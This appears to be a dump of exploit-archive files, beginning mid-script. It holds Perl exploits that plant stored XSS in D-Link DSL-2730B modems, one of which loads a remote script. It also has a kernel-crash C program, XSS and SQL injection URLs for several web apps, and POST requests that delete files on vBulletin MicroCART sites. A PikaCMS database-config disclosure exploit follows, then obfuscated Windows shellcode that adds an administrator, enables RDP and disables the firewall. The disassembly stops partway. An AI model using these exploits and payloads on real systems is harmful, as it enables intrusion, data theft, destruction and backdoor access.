print "Options: 1 - Parameter: wlAuthMode \n";
|
||||
print " 2 - Parameter: wl_wsc_reg \n ";
|
||||
print " 3 - Parameter: wl_wsc_mode \n";
|
||||
print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
|
||||
}else{
|
||||
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "[+] Exploring $ip\/ ...\n";
|
||||
|
||||
my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
|
||||
my $ua = new LWP::UserAgent;
|
||||
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
|
||||
$hdrs->authorization_basic($user, $pass);
|
||||
|
||||
chomp($ip);
|
||||
|
||||
print "[+] Preparing...\n";
|
||||
my $url_and_payload = "";
|
||||
|
||||
if($opt == 1){
|
||||
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload".
|
||||
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
|
||||
}elsif($opt == 2){
|
||||
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354".
|
||||
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
|
||||
|
||||
}elsif($opt == 3){
|
||||
|
||||
$payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
|
||||
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354".
|
||||
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
|
||||
|
||||
}elsif($opt == 4){
|
||||
|
||||
$payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
|
||||
$url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&".
|
||||
"wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&".
|
||||
"wlSsidIdx=0&wlSyncNvram=1";
|
||||
|
||||
}else{
|
||||
|
||||
print "[-] Chose one option!\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
print "[+] Requesting...\n";
|
||||
my $resp = $ua->request($req);
|
||||
if ($resp->is_success){
|
||||
|
||||
print "[+] Successfully Requested!\n";
|
||||
|
||||
my $resposta = $resp->as_string;
|
||||
|
||||
print "[+] Checking for properly explored...\n";
|
||||
my $url = "$ip/wlsecurity.html";
|
||||
$req = new HTTP::Request("GET",$url,$hdrs);
|
||||
|
||||
print "[+] Checking that was explored...\n";
|
||||
|
||||
my $resp2 = $ua->request($req);
|
||||
|
||||
if ($resp2->is_success){
|
||||
my $result = $resp2->as_string;
|
||||
if($opt == 4){
|
||||
$payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
|
||||
}
|
||||
|
||||
if(index($result, uri_unescape($payload)) != -1){
|
||||
print "[+] Successfully Exploited!";
|
||||
}else{
|
||||
print "[-] Not Exploited!";
|
||||
}
|
||||
}
|
||||
}else {
|
||||
|
||||
print "[-] Ops!\n";
|
||||
print $resp->message;
|
||||
}
|
||||
}
|
138
platforms/hardware/webapps/35750.pl
Executable file
138
platforms/hardware/webapps/35750.pl
Executable file
|
@ -0,0 +1,138 @@
|
|||
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
|
||||
# Date: 11-01-2015
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.dlink.com
|
||||
# Hardware version: C1
|
||||
# Version: GE 1.01
|
||||
# Tested on: Windows 8 and Linux
|
||||
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Date dd-mm-aaaa: 11-11-2014
|
||||
# Exploit for D-Link DSL-2730B
|
||||
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
|
||||
# Developed by Mauricio Corrêa
|
||||
# XLabs Information Security
|
||||
# WebSite: www.xlabs.com.br
|
||||
# More informations: www.xlabs.com.br/blog/?p=339
|
||||
#
|
||||
# CAUTION!
|
||||
# This exploit enable some features of the modem,
|
||||
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
|
||||
# occurring script execution in the browser of internal network users.
|
||||
#
|
||||
# Use with caution!
|
||||
# Use at your own risk!
|
||||
#
|
||||
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
use diagnostics;
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request;
|
||||
use URI::Escape;
|
||||
|
||||
|
||||
my $ip = $ARGV[0];
|
||||
my $user = $ARGV[1];
|
||||
my $pass = $ARGV[2];
|
||||
|
||||
$ip = $1 if($ip=~/(.*)\/$/);
|
||||
|
||||
if (@ARGV != 3){
|
||||
print "\n";
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
|
||||
|
||||
}else{
|
||||
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "[+] Exploring $ip\/ ...\n";
|
||||
|
||||
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
|
||||
|
||||
my $ua = new LWP::UserAgent;
|
||||
|
||||
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
|
||||
|
||||
|
||||
$hdrs->authorization_basic($user, $pass);
|
||||
|
||||
chomp($ip);
|
||||
|
||||
|
||||
print "[+] Preparing...\n";
|
||||
|
||||
|
||||
my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
|
||||
|
||||
|
||||
my $req = new HTTP::Request("GET",$url,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
|
||||
print "[+] Requesting...\n";
|
||||
|
||||
my $resp = $ua->request($req);
|
||||
|
||||
if ($resp->is_success){
|
||||
|
||||
print "[+] Successfully Requested!\n";
|
||||
|
||||
my $resposta = $resp->as_string;
|
||||
|
||||
print "[+] Obtain session key...\n";
|
||||
|
||||
my $token = "";
|
||||
|
||||
if($resposta =~ /sessionKey=(.*)\';/){
|
||||
$token = $1;
|
||||
print "[+] Session key found: $token\n";
|
||||
}else{
|
||||
print "[-] Session key not found!\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
print "[+] Preparing exploit...\n";
|
||||
|
||||
my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
|
||||
|
||||
$req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
|
||||
print "[+] Exploiting...\n";
|
||||
|
||||
my $resp2 = $ua->request($req);
|
||||
|
||||
|
||||
if ($resp2->is_success){
|
||||
|
||||
my $resultado = $resp2->as_string;
|
||||
|
||||
if(index($resultado, uri_unescape($payload)) != -1){
|
||||
|
||||
print "[+] Successfully Exploited!";
|
||||
|
||||
}else{
|
||||
|
||||
print "[-] Not Exploited!";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}else {
|
||||
|
||||
print "[-] Ops!\n";
|
||||
print $resp->message;
|
||||
}
|
||||
}
|
115
platforms/hardware/webapps/35751.pl
Executable file
115
platforms/hardware/webapps/35751.pl
Executable file
|
@ -0,0 +1,115 @@
|
|||
# Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored
|
||||
# Date: 11-01-2015
|
||||
# Exploit Author: Mauricio Correa
|
||||
# Vendor Homepage: www.dlink.com
|
||||
# Hardware version: C1
|
||||
# Version: GE 1.01
|
||||
# Tested on: Windows 8 and Linux
|
||||
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Date dd-mm-aaaa: 11-11-2014
|
||||
# Exploit for D-Link DSL-2730B
|
||||
# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi
|
||||
# Developed by Mauricio Corrêa
|
||||
# XLabs Information Security
|
||||
# WebSite: www.xlabs.com.br
|
||||
# More informations: www.xlabs.com.br/blog/?p=339
|
||||
#
|
||||
# CAUTION!
|
||||
# This exploit disables some features of the modem,
|
||||
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
|
||||
# occurring script execution in the browser of internal network users.
|
||||
#
|
||||
# Use with caution!
|
||||
# Use at your own risk!
|
||||
#
|
||||
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
use diagnostics;
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request;
|
||||
use URI::Escape;
|
||||
|
||||
my $ip = $ARGV[0];
|
||||
my $user = $ARGV[1];
|
||||
my $pass = $ARGV[2];
|
||||
|
||||
$ip = $1 if($ip=~/(.*)\/$/);
|
||||
|
||||
if (@ARGV != 3){
|
||||
|
||||
print "\n";
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
|
||||
}else{
|
||||
print "XLabs Information Security www.xlabs.com.br\n";
|
||||
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
|
||||
print "Developed by Mauricio Correa\n";
|
||||
print "Contact: mauricio\@xlabs.com.br\n";
|
||||
print "[+] Exploring $ip\/ ...\n";
|
||||
|
||||
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
|
||||
|
||||
my $ua = new LWP::UserAgent;
|
||||
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
|
||||
|
||||
$hdrs->authorization_basic($user, $pass);
|
||||
|
||||
chomp($ip);
|
||||
|
||||
print "[+] Preparing exploit...\n";
|
||||
|
||||
my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload";
|
||||
|
||||
my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
|
||||
|
||||
print "[+] Prepared!\n";
|
||||
|
||||
print "[+] Requesting and Exploiting...\n";
|
||||
|
||||
my $resp = $ua->request($req);
|
||||
|
||||
if ($resp->is_success){
|
||||
|
||||
print "[+] Successfully Requested!\n";
|
||||
|
||||
|
||||
my $url = "$ip/lancfg2.html";
|
||||
|
||||
$req = new HTTP::Request("GET",$url,$hdrs);
|
||||
|
||||
print "[+] Checking that was explored...\n";
|
||||
|
||||
|
||||
my $resp2 = $ua->request($req);
|
||||
|
||||
|
||||
if ($resp2->is_success){
|
||||
|
||||
my $resultado = $resp2->as_string;
|
||||
|
||||
if(index($resultado, uri_unescape($payload)) != -1){
|
||||
|
||||
print "[+] Successfully Exploited!";
|
||||
|
||||
}else{
|
||||
|
||||
print "[-] Not Exploited!";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}else {
|
||||
|
||||
print "[-] Ops!\n";
|
||||
print $resp->message;
|
||||
}
|
||||
|
||||
}
|
26
platforms/linux/dos/35820.c
Executable file
26
platforms/linux/dos/35820.c
Executable file
|
@ -0,0 +1,26 @@
|
|||
source: http://www.securityfocus.com/bid/48101/info
|
||||
|
||||
The Linux kernel is prone to a local denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition.
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/mman.h>
|
||||
#define BUFSIZE getpagesize()
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
void *ptr;
|
||||
if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0) {
|
||||
perror("posix_memalign");
|
||||
exit(1);
|
||||
}
|
||||
if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) {
|
||||
perror("madvise");
|
||||
exit(1);
|
||||
}
|
||||
*(char *)NULL = 0;
|
||||
return 0;
|
||||
}
|
10
platforms/multiple/remote/35818.txt
Executable file
10
platforms/multiple/remote/35818.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/48087/info
|
||||
|
||||
Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Nagios 3.2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
|
||||
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>
|
120
platforms/php/webapps/35733.txt
Executable file
120
platforms/php/webapps/35733.txt
Executable file
|
@ -0,0 +1,120 @@
|
|||
# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion,
|
||||
SQL Injection & XSS
|
||||
# Date: January 8, 2015
|
||||
# Exploit Author: Technidev (https://technidev.com)
|
||||
# Vendor Homepage: https://vbulletin.com
|
||||
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
|
||||
# Version: 1.1.4
|
||||
|
||||
This plugin is fairly old but still used by a lot of people and received
|
||||
its last update nearly 4 years ago.
|
||||
It’s vulnerable to arbitrary file deletion and SQL injection.
|
||||
|
||||
*Arbitrary File(s) Deletion*
|
||||
In /microcart/editor/assetmanager/ are a bunch of files which are
|
||||
probably used to manage files/folders for the administrator,
|
||||
unfortunately no authentication and checks were added to see if the user
|
||||
should have access to it and if the request doesn’t contain anything
|
||||
malicious.
|
||||
|
||||
The /microcart/editor/assetmanager/folderdel_.php file contains the
|
||||
following on top:
|
||||
|
||||
$sMsg = "";
|
||||
|
||||
if(isset($_POST["inpCurrFolder"]))
|
||||
{
|
||||
$sDestination = pathinfo($_POST["inpCurrFolder"]);
|
||||
|
||||
//DELETE ALL FILES IF FOLDER NOT EMPTY
|
||||
$dir = $_POST["inpCurrFolder"];
|
||||
$handle = opendir($dir);
|
||||
while($file = readdir($handle)) if($file != "." && $file != "..")
|
||||
unlink($dir . "/" . $file);
|
||||
closedir($handle);
|
||||
|
||||
if(rmdir($_POST["inpCurrFolder"])==0)
|
||||
$sMsg = "";
|
||||
else
|
||||
$sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
|
||||
}
|
||||
By simply sending a POST request to this file, we can delete every
|
||||
single file in specified folder.
|
||||
|
||||
POST to: /microcart/editor/assetmanager/folderdel_.php
|
||||
POST data: inpCurrFolder: ../../../
|
||||
This POST request will delete every single .php file in the root folder
|
||||
of vBulletin.
|
||||
|
||||
*Arbitrary File Deletion*
|
||||
There’s another vulnerability which resides in the
|
||||
/microcart/editor/assetmanager/assetmanager.php file. It contains an
|
||||
upload function, which is safe, and a file deletion function, which is
|
||||
not safe. We can delete any file off the server by abusing this. So
|
||||
unlike the previous vulnerability I just wrote which deletes all files
|
||||
by sending a POST request with a folder value, this will only delete 1
|
||||
file off the server.
|
||||
|
||||
Vulnerable code:
|
||||
if(isset($_POST["inpFileToDelete"]))
|
||||
{
|
||||
$filename=pathinfo($_POST["inpFileToDelete"]);
|
||||
$filename=$filename['basename'];
|
||||
if($filename!="")
|
||||
unlink($currFolder . "/" . $filename);
|
||||
$sMsg = "";
|
||||
}
|
||||
Exploited by sending the following request:
|
||||
|
||||
POST to: /microcart/editor/assetmanager/assetmanager.php
|
||||
POST data: inpCurrFolder: ../../../
|
||||
inpFileToDelete: index.php
|
||||
This will delete the /index.php file of vBulletin, in the root.
|
||||
|
||||
*Aribtrary Folder Creation*
|
||||
Besides the file deletion, there’s a file called
|
||||
/microcart/editor/assetmanager/foldernew.php which created a 0755
|
||||
chmodded folder on the server.
|
||||
The file contains the following on top:
|
||||
$sMsg = "";
|
||||
|
||||
if(isset($_POST["inpNewFolderName"]))
|
||||
{
|
||||
$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
|
||||
|
||||
if(is_dir($sFolder)==1)
|
||||
{//folder already exist
|
||||
$sMsg = "<script>document.write(getTxt('Folder already
|
||||
exists.'))</script>";
|
||||
}
|
||||
else
|
||||
{
|
||||
//if(mkdir($sFolder))
|
||||
if(mkdir($sFolder,0755))
|
||||
$sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
|
||||
else
|
||||
$sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
|
||||
}
|
||||
}
|
||||
By sending the following POST request, we will create a folder with 0755
|
||||
chmodded permission.
|
||||
|
||||
POST to: /microcart/editor/assetmanager/foldernew.php
|
||||
POST data: inpNewFolderName: davewashere
|
||||
inpCurrFolder: ../../..
|
||||
This POST request will create the folder davewashere in the root of the
|
||||
vBulletin forum.
|
||||
|
||||
*SQL Injection*
|
||||
MicroCART is also vulnerable to SQL injection at several locations
|
||||
although most of them are rather hard to abuse. I will not explain how
|
||||
to exploit it, but the vulnerability can be found at /cart.php line 833
|
||||
to 881 and the function where you can add products to your shopping
|
||||
cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to
|
||||
the configuration variable which is later used in a query.
|
||||
|
||||
*Cross Site Scripting*
|
||||
When modifying your information at /cart.php?do=cpanel, you can inject
|
||||
anything you want into the fields.
|
||||
Viewing reviews of products may be vulnerable as well when you leave out
|
||||
the wysiwyg POST key.
|
11
platforms/php/webapps/35814.txt
Executable file
11
platforms/php/webapps/35814.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/48067/info
|
||||
|
||||
TEDE Simplificado is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
TEDE Simplificado v1.01 and vS2.04 are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
|
||||
|
||||
http://www.example.com/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4
|
51
platforms/php/webapps/35815.pl
Executable file
51
platforms/php/webapps/35815.pl
Executable file
|
@ -0,0 +1,51 @@
|
|||
source: http://www.securityfocus.com/bid/48068/info
|
||||
|
||||
PikaCMS is prone to multiple local file-disclosure vulnerabilities because it fails to adequately validate user-supplied input.
|
||||
|
||||
Exploiting these vulnerabilities may allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
||||
|
||||
use LWP::Simple;
|
||||
use LWP::UserAgent;
|
||||
system('cls');
|
||||
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit');
|
||||
system('color 2');
|
||||
if(@ARGV < 2)
|
||||
{
|
||||
print "[-]Su Sekilde Kocum. \n\n";
|
||||
&help; exit();
|
||||
}
|
||||
sub help()
|
||||
{
|
||||
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
|
||||
print "[+] usage2 : perl $0 localhost / \n";
|
||||
}
|
||||
print "\n************************************************************************\n";
|
||||
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit *\n";
|
||||
print "\* Exploited By : KnocKout *\n";
|
||||
print "\* Contact : knockoutr[at]msn[dot]com *\n";
|
||||
print "\* -- *\n";
|
||||
print "\*********************************************************************\n\n\n";
|
||||
($TargetIP, $path, $File,) = @ARGV;
|
||||
$File="shkarko.php?f=lidhjet/baza_mysql.php";
|
||||
my $url = "http://" . $TargetIP . $path . $File;
|
||||
print "\n Az Bekle Sikertiyorum!!! \n\n";
|
||||
my $useragent = LWP::UserAgent->new();
|
||||
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
|
||||
if ($request->is_success)
|
||||
{
|
||||
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
|
||||
print "[+] OPERASYON TAMAM !\n";
|
||||
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
|
||||
print "[+] GRAYHATZ STAR \n";
|
||||
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
|
||||
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
|
||||
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
|
||||
\n";
|
||||
exit();
|
||||
}
|
||||
else
|
||||
{
|
||||
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
|
||||
exit();
|
||||
}
|
||||
|
17
platforms/php/webapps/35816.txt
Executable file
17
platforms/php/webapps/35816.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/48083/info
|
||||
|
||||
ARSC Really Simple Chat is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
ARSC Really Simple Chat 3.3-rc2 is vulnerable; other versions may also be affected.
|
||||
|
||||
SQL injection:
|
||||
|
||||
http://www.example.com/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
|
||||
http://www.example.com/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
|
||||
http://www.example.com/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202
|
||||
|
||||
Cross-site Scripting:
|
||||
|
||||
http://www.example.com/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
9
platforms/php/webapps/35819.txt
Executable file
9
platforms/php/webapps/35819.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/48100/info
|
||||
|
||||
Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Ushahidi 2.0.1 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php/admin/dashboard/?range=1[SQLi]
|
442
platforms/win32/shellcode/35793.txt
Executable file
442
platforms/win32/shellcode/35793.txt
Executable file
|
@ -0,0 +1,442 @@
|
|||
#Author: Ali Razmjoo
|
||||
??#Title: ?Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
|
||||
Obfuscated Shellcode Windows x86 [1218 Bytes].c
|
||||
|
||||
/*
|
||||
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
#length: 1218 bytes
|
||||
#Date: 13 January 2015
|
||||
#Author: Ali Razmjoo
|
||||
#tested On: Windows 7 x86 ultimate
|
||||
|
||||
WinExec => 0x7666e695
|
||||
ExitProcess => 0x76632acf
|
||||
====================================
|
||||
Execute :
|
||||
net user ALI ALI /add
|
||||
net localgroup Administrators ALI /add
|
||||
NET LOCALGROUP "Remote Desktop Users" ALI /add
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
|
||||
netsh firewall set opmode disable
|
||||
sc config termservice start= auto
|
||||
====================================
|
||||
|
||||
|
||||
|
||||
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
|
||||
|
||||
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
|
||||
|
||||
|
||||
C:\Users\Ali\Desktop>objdump -D shellcode.o
|
||||
|
||||
shellcode.o: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <.text>:
|
||||
0: 31 c0 xor %eax,%eax
|
||||
2: 50 push %eax
|
||||
3: b8 41 41 41 64 mov $0x64414141,%eax
|
||||
8: c1 e8 08 shr $0x8,%eax
|
||||
b: c1 e8 08 shr $0x8,%eax
|
||||
e: c1 e8 08 shr $0x8,%eax
|
||||
11: 50 push %eax
|
||||
12: b9 6d 76 53 52 mov $0x5253766d,%ecx
|
||||
17: ba 4d 59 32 36 mov $0x3632594d,%edx
|
||||
1c: 31 d1 xor %edx,%ecx
|
||||
1e: 51 push %ecx
|
||||
1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
|
||||
24: ba 4e 33 2d 38 mov $0x382d334e,%edx
|
||||
29: 31 d1 xor %edx,%ecx
|
||||
2b: 51 push %ecx
|
||||
2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
|
||||
31: ba 4c 34 34 31 mov $0x3134344c,%edx
|
||||
36: 31 d1 xor %edx,%ecx
|
||||
38: 51 push %ecx
|
||||
39: b9 46 47 57 46 mov $0x46574746,%ecx
|
||||
3e: ba 33 34 32 34 mov $0x34323433,%edx
|
||||
43: 31 d1 xor %edx,%ecx
|
||||
45: 51 push %ecx
|
||||
46: b9 56 50 47 64 mov $0x64475056,%ecx
|
||||
4b: ba 38 35 33 44 mov $0x44333538,%edx
|
||||
50: 31 d1 xor %edx,%ecx
|
||||
52: 51 push %ecx
|
||||
53: 89 e0 mov %esp,%eax
|
||||
55: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
5a: c1 eb 08 shr $0x8,%ebx
|
||||
5d: c1 eb 08 shr $0x8,%ebx
|
||||
60: c1 eb 08 shr $0x8,%ebx
|
||||
63: 53 push %ebx
|
||||
64: 50 push %eax
|
||||
65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
6a: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
6f: 31 d3 xor %edx,%ebx
|
||||
71: ff d3 call *%ebx
|
||||
73: 31 c0 xor %eax,%eax
|
||||
75: 50 push %eax
|
||||
76: 68 41 41 64 64 push $0x64644141
|
||||
7b: 58 pop %eax
|
||||
7c: c1 e8 08 shr $0x8,%eax
|
||||
7f: c1 e8 08 shr $0x8,%eax
|
||||
82: 50 push %eax
|
||||
83: b9 01 41 60 32 mov $0x32604101,%ecx
|
||||
88: ba 48 61 4f 53 mov $0x534f6148,%edx
|
||||
8d: 31 d1 xor %edx,%ecx
|
||||
8f: 51 push %ecx
|
||||
90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
|
||||
95: ba 5b 67 4c 63 mov $0x634c675b,%edx
|
||||
9a: 31 d1 xor %edx,%ecx
|
||||
9c: 51 push %ecx
|
||||
9d: b9 03 24 36 21 mov $0x21362403,%ecx
|
||||
a2: ba 62 50 59 53 mov $0x53595062,%edx
|
||||
a7: 31 d1 xor %edx,%ecx
|
||||
a9: 51 push %ecx
|
||||
aa: b9 34 41 15 18 mov $0x18154134,%ecx
|
||||
af: ba 5d 32 61 6a mov $0x6a61325d,%edx
|
||||
b4: 31 d1 xor %edx,%ecx
|
||||
b6: 51 push %ecx
|
||||
b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
|
||||
bc: ba 68 68 72 4b mov $0x4b726868,%edx
|
||||
c1: 31 d1 xor %edx,%ecx
|
||||
c3: 51 push %ecx
|
||||
c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
|
||||
c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
|
||||
ce: 31 d1 xor %edx,%ecx
|
||||
d0: 51 push %ecx
|
||||
d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
|
||||
d6: ba 70 4b 70 51 mov $0x51704b70,%edx
|
||||
db: 31 d1 xor %edx,%ecx
|
||||
dd: 51 push %ecx
|
||||
de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
|
||||
e3: ba 51 45 51 2d mov $0x2d514551,%edx
|
